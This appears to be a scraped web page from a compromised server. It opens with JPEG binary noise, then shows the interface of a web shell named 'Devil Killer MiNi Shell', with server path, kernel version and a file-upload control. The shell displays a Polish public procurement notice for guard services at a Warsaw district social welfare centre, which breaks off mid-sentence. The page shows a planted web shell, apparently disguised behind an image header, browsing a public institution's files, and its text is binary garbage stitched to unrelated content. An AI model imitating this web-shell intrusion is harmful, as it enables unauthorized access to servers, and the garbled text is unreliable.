JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250408/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250408/0018211801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług ochrony fizycznej osób i mienia w 3 obiektach Ośrodka Pomocy Społecznej Dzielnicy Wola m.st.<br/>Warszawy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK POMOCY SPOŁECZNEJ DZIELNICY WOLA M.ST. WARSZAWY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 002010882</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Józefa Bema 91</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@ops-wola.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ops-wola.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług ochrony fizycznej osób i mienia w 3 obiektach Ośrodka Pomocy Społecznej Dzielnicy Wola m.st.<br/>Warszawy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-502b132f-f525-4dbe-b1bb-8d8d54d86cfa</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00182118</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00023516/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług ochrony fizycznej osób i mienia w 3 obiektach Ośrodka Pomocy Społecznej Dzielnicy Wola m.st. Warszawy.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-502b132f-f525-4dbe-b1bb-8d8d54d86cfa <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyci u Platformy e Zamówienia,<br/>która jest dostępna pod adresem https://ezamowienia.gov.plhttps://ezamowienia.gov.pl i/lub i/lub drogą elektroniczną na adres<br/>poczty elektronicznej: zamowieniapzamowieniapubliczne@opsubliczne@ops-wola.waw.plwola.waw.pl (nie dotyczy składania ofert).<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji”<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do<br/>komunikacji umożliwiają również dołączenie<br/>załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, w związku z art. 19 ust. 1 ustawy Pzp, Zamawiający informuje, że:<br/>1) administratorem danych osobowych ujawnionych celem przeprowadzenia niniejszego postępowania jest O środek Pomocy<br/>Społecznej Dzielnicy Wola m. st. Warszawy z siedzibą przy ul. J. Bema 91, 01 233 Warszawa, adres e mail:<br/>sekretariat@ops-wola.waw.pl, tel. 22 571 50 00 , zwane w dalszej części obowiązku informacyjnego „ OPS lub Ośrodkiem&#39;&#39;;<br/>2) OPS powołał inspektora ochrony danych, z którym można się kontaktować poprzez email, pisząc na adres e mail: iod@opswola.<br/>waw.pl;<br/>3) dane osobowe, podane Ośrodkowi przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>przeprowadzenia postępowania<br/>ws. udzielenia zamówienia publicznego, zgodnie z przepisami ustawy Pzp<br/>Po zakończeniu postępowania, dane osobowe będą przechowywane w celach<br/>archiwalnych, przez okres 5 lat, zgodnie z ustawą o narodowym zasobie archiwalnym i archiwach, z zastrzeżeniem protokołu z<br/>postępowania, którego okres przechowywania przez Zamawiającego określa art. 78 ust. 1 ustawy Pzp (4 lata po zakończeniu<br/>postępowania)<br/>4) odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania na<br/>podstawie art. 18 oraz art. 72 ust. 1 ustawy Pzp, a także ustawy o dostępie do informacji publicznej<br/>5) obowiązek podania danych osobowych jest związany z udziałem w postępowaniu o udzielenie zamówienia; konsekwencją<br/>niepodania określonych danych jest brak możliwości wybrania oferty<br/>6) w odniesieniu do danych osobowych podanych przez Wykonawcę, decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosownie do art. 22 RODO<br/>5) obowiązek podania danych osobowych jest związany z udziałem<br/>w postępowaniu o udzielenie zamówienia; konsekwencją niepodania określonych danych jest brak możliwości wybrania oferty;<br/>6) w odniesieniu do danych osobowych podanych przez Wykonawcę, decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosownie do art. 22 RODO;<br/>7) osoba, której dane podano w postępowaniu posiada:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych jej dotyczących, z tym zastrzeżeniem, że w przypadku, gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku Centrum może<br/>żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu:<br/>• sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego (art.18 ust. 6<br/>ustawy Pzp);<br/>• sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia (art. 78 ust. 1 ustawy Pzp);<br/>b) na podstawie art. 18 RODO prawo żądania od administratora danych osobowych ograniczenia przetwarzania danych osobowych<br/>z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>c) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, że przetwarzanie danych<br/>osobowych jej dotyczących narusza przepisy RODO;<br/>3. Realizacja przedmiotu zamówienia nie będzie się wiązać z powierzeniem Wykonawcy przetwarzania danych osobowych – w<br/>rozumieniu art. 28 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na podstawie art. 16 RODO prawo do sprostowania danych osobowych,<br/>z tym zastrzeżeniem, że:<br/>• skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą (art. 18 ust. 6 ustawy Pzp);<br/>• skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO<br/>nie może naruszać integralności protokołu oraz jego załączników (art. 19 ust. 2 ustawy Pzp).<br/>Osobie, której dane podano w postępowaniu nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b i d RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>jego danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą;<br/>Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKiA.26.2.1.2025.MBS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług ochrony fizycznej osób i mienia na rzecz Ośrodka Pomocy Społecznej Dzielnicy Wola m.st. Warszawy,<br/>realizowanych w siedzibie Zamawiającego przy ul. Bema 91 w Warszawie – budynek dwukondygnacyjny, wolno stojący, o powierzchni ogólnej 1071 m2, w którym na parterze mieści się duży hol. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Do 50% wartości zamówienia pierwotnego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty, każda część przedmiotu zamówienia będzie oceniana oddzielnie. Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena („C”) – waga kryterium 60%;<br/>2) Doświadczenie zawodowe osób wyznaczonych przez Wykonawcę do realizacji zamówienia – kwalifikowani pracownicy ochrony („D”) – waga kryterium 40%<br/>Doświadczenie zawodowe kwalifikowanego pracownika ochrony będzie punktowane następująco:<br/>Część I przedmiotu zamówienia:<br/>1)	skierowanie do realizacji usług 1 pracownika kwalifikowanego, posiadającego <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 5 punktów.<br/>2)	skierowanie do realizacji usług 2 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 10 punktów.<br/>3)	skierowanie do realizacji usług 3 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 20 punktów.<br/>4)	skierowanie do realizacji usług 4 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 30 punktów.<br/>5)	skierowanie do realizacji usług 5 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 40 punktów.<br/>Część II przedmiotu zamówienia:<br/>1)	skierowanie do realizacji usług 1 pracownika kwalifikowanego, posiadającego <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 15 punktów.<br/>2)	skierowanie do realizacji usług 2 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 25 punktów.<br/>3)	skierowanie do realizacji usług 3 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 40 punktów.<br/>Część III przedmiotu zamówienia: <br/>1)	skierowanie do realizacji usług 1 pracownika kwalifikowanego, posiadającego <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 20 punktów. <br/>2)	kierowanie do realizacji usług 2 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 40 punktów. <br/>Jeżeli Wykonawca nie zadeklaruje w Formularzu Ofertowym ilu pracowników, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej w obiektach użyteczności publicznej, zostanie skierowanych do realizacji zamówienia, Zamawiający przyzna <br/>0 punktów w tym kryterium.<br/>Wykonawca będzie zobowiązany do zapewnienia, przez cały okres realizacji zamówienia kwalifikowanych pracowników ochrony o doświadczeniu umożliwiającym zdobycie takiej samej ilości punktów, jakie otrzymał podczas przyznawania punktów w kryteriach oceny ofert.<br/>3)	Łączna liczba punktów.<br/>Ł = C + D<br/>gdzie:<br/>Ł - Łączna liczba punktów badanej oferty,<br/>C - liczba punktów jakie otrzyma badana oferta w kryterium cena,<br/>D - liczba punktów jakie otrzyma badana oferta w kryterium doświadczenie pracowników ochrony.<br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczeniezawodowe osób wyznaczonych przez Wykonawcę do realizacji zamówienia – kwalifikowani pracownicy ochrony</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług ochrony fizycznej osób i mienia na rzecz Ośrodka Pomocy Społecznej Dzielnicy Wola m.st. Warszawy,<br/>realizowanych w siedzibie Działu Wsparcia i Pomocy Rodzinie (zwanym dalej „DWPR”) oraz Działu przeciwdziałania<br/>Przemocy Domowej przy Alei „Solidarności” 102 w Warszawie<br/>– budynek jednokondygnacyjny, o powierzchni użytkowej 452 m2, niepodpiwniczony </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-08-01 do 2026-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Do 50% wartości zamówienia</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty, każda część przedmiotu zamówienia będzie oceniana oddzielnie. Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena („C”) – waga kryterium 60%;<br/>2) Doświadczenie zawodowe osób wyznaczonych przez Wykonawcę do realizacji zamówienia – kwalifikowani pracownicy ochrony („D”) – waga kryterium 40%<br/>Doświadczenie zawodowe kwalifikowanego pracownika ochrony będzie punktowane następująco:<br/>Część I przedmiotu zamówienia:<br/>1)	skierowanie do realizacji usług 1 pracownika kwalifikowanego, posiadającego <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 5 punktów.<br/>2)	skierowanie do realizacji usług 2 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 10 punktów.<br/>3)	skierowanie do realizacji usług 3 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 20 punktów.<br/>4)	skierowanie do realizacji usług 4 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 30 punktów.<br/>5)	skierowanie do realizacji usług 5 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 40 punktów.<br/>Część II przedmiotu zamówienia:<br/>1)	skierowanie do realizacji usług 1 pracownika kwalifikowanego, posiadającego <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 15 punktów.<br/>2)	skierowanie do realizacji usług 2 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 25 punktów.<br/>3)	skierowanie do realizacji usług 3 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 40 punktów.<br/>Część III przedmiotu zamówienia: <br/>1)	skierowanie do realizacji usług 1 pracownika kwalifikowanego, posiadającego <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 20 punktów. <br/>2)	kierowanie do realizacji usług 2 pracowników kwalifikowanych, posiadających <br/>co najmniej 4 letnie doświadczenie w wykonywaniu usług ochrony fizycznej <br/>w obiektach użyteczności publicznej = 40 punktów. <br/>Jeżeli Wykonawca nie zadeklaruje w 